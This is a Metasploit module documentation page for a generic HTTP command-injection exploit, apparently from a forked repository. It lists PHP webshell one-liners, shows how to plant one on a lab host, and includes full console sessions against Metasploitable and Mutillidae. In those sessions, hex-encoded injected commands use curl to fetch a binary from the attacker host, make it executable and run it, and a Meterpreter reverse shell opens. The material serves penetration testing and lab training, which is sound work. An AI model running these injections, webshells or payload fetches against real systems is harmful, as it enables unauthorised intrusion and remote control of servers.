adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
metasploit-gs/documentation/modules/exploit/multi/http/os_cmd_exec.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

267 lines
13 KiB
Markdown
Raw Permalink Normal View History

Add: exploits/multi/http/os_cmd_exec
2026-02-26 17:25:26 +00:00
## Vulnerable Application
This module is for any generic HTTP command execution where user-supplied input is directly passed to system execution functions via a HTTP request.
As a result, able to use:
- Any web command execution vulnerability _(think hardware devices having ping/traceroute functions)_
- Any lab target, which have a "command execution" module.
- Such as [DVWA](https://github.com/digininja/DVWA) or [Mutillidae](https://github.com/webpwnized/mutillidae)
- Included with [Metasploitable](https://docs.rapid7.com/metasploit/metasploitable-2/)
- Alternatively, simulate with one of the following PHP code snippets (for a basic webshell):
- `<?php system($_REQUEST["cmd"]); ?>`
- `<?php passthru($_REQUEST["cmd"]); ?>`
- `<?php echo exec($_REQUEST["cmd"]); ?>`
- `<?php echo shell_exec($_REQUEST["cmd"]); ?>`
- `<?php echo fread(popen($_REQUEST["cmd"], "r"), 2096); ?>`
- ```<?php echo `{$_REQUEST["cmd"]}`; ?>```
This is similar to `exploits/unix/webapp/php_eval`, except it isn't limited to PHPs code execution, but can use any OS command execution function.
- - -
Setting up a quick PHP test lab on a Debian-base host:
```console
$ sudo apt-get install --yes apache2 php curl
[...]
$
$ sudo systemctl start apache2
$
$ echo '<?php system($_REQUEST["cmd"]); ?>' | sudo tee /var/www/html/shell.php
<?php system($_REQUEST["cmd"]); ?>
$
$ curl localhost/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
```
## Verification Steps
1. Setup lab, or find a web command execution vulnerability
1. Start `msfconsole`
1. Do: `use exploits/multi/http/os_cmd_exec`
1. Do: Set `RHOSTS` and `URIPATH` (`HEADERS` and `POSTDATA` are optional, depending on vulnerability). May also want to customize the payload and `LHOST` if desired
1. Do: `run`
1. You should get a shell
## Options
### `HEADERS`
Any additional HTTP headers to send, cookies for example. Format: `header:value,header2:value2`.
### `POSTDATA`
Any HTTP POST method request data to send, with the command injection placeholder set to `!INJECT!`.
If this value is blank, will be a HTTP GET method request.
### `Proxies`
A proxy chain of format: `type:host:port[,type:host:port][...]`.
Supported proxies: `sapni`, `socks4`, `socks5`, `socks5h`, `http`
### `RHOSTS`
The target host(s), see: https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
### `RPORT`
The target port (TCP).
Default: `80`
### `SSL`
Negotiate SSL/TLS for outgoing connections.
Default: `false`
### `URIPATH`
The URI to request, with the command injection placeholder set to `!INJECT!`.
Default: `/ping/?cmd=!INJECT!`
### `VHOST`
HTTP server virtual host.
## Scenarios
### Example PHP Lab
```console
msfadmin@metasploitable:~$ echo '<?php system($_REQUEST["cmd"]); ?>' | sudo tee /var/www/shell.php
<?php system($_REQUEST["cmd"]); ?>
msfadmin@metasploitable:~$ curl localhost/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
msfadmin@metasploitable:~$
msf exploit(multi/http/os_cmd_exec) > options
Module options (exploit/multi/http/os_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADERS no Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
POSTDATA no POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4
RHOSTS 10.0.0.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /shell.php?cmd=!INJECT! yes The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
zsh) (Accepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST tap0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,GET,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME mANdNVqs no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Linux
View the full module info with the info, or info -d command.
msf exploit(multi/http/os_cmd_exec) > check
[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=echo%20lKPACzWGh0CD9fjQh2HJAPzO
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(multi/http/os_cmd_exec) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=/bin/echo%20-ne%20%27\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x3b\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x26%27%7csh
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:46267) at 2026-03-14 20:35:06 +0000
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```
### Mutillidae
This is on Metasploitable 2 VM:
```console
msf > use exploits/multi/http/os_cmd_exec
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/os_cmd_exec) > set PAYLOAD cmd/linux/http/x86/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x86/meterpreter/reverse_tcp
msf exploit(multi/http/os_cmd_exec) > set RHOSTS 10.0.0.10
RHOSTS => 10.0.0.10
msf exploit(multi/http/os_cmd_exec) > set LHOST tap0
LHOST => tap0
msf exploit(multi/http/os_cmd_exec) > set URIPATH /mutillidae/index.php?page=dns-lookup.php
URIPATH => /mutillidae/index.php?page=dns-lookup.php
msf exploit(multi/http/os_cmd_exec) > set POSTDATA "target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS"
POSTDATA => target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > options
Module options (exploit/multi/http/os_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADERS no Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
POSTDATA target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS no POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS 10.0.0.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URIPATH /mutillidae/index.php?page=dns-lookup.php yes The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
zsh) (Accepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST tap0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,GET,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME SYonhqJf no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Linux
View the full module info with the info, or info -d command.
msf exploit(multi/http/os_cmd_exec) > check
[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;echo%203uCamYlgMAEsiPoIGU6cWjjQIgzI&dns-lookup-php-submit-button=Lookup+DNS
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(multi/http/os_cmd_exec) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x3b\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x26'|sh&dns-lookup-php-submit-button=Lookup+DNS
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:45260) at 2026-03-14 07:32:49 +0000
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```
Reference in New Issue Copy Permalink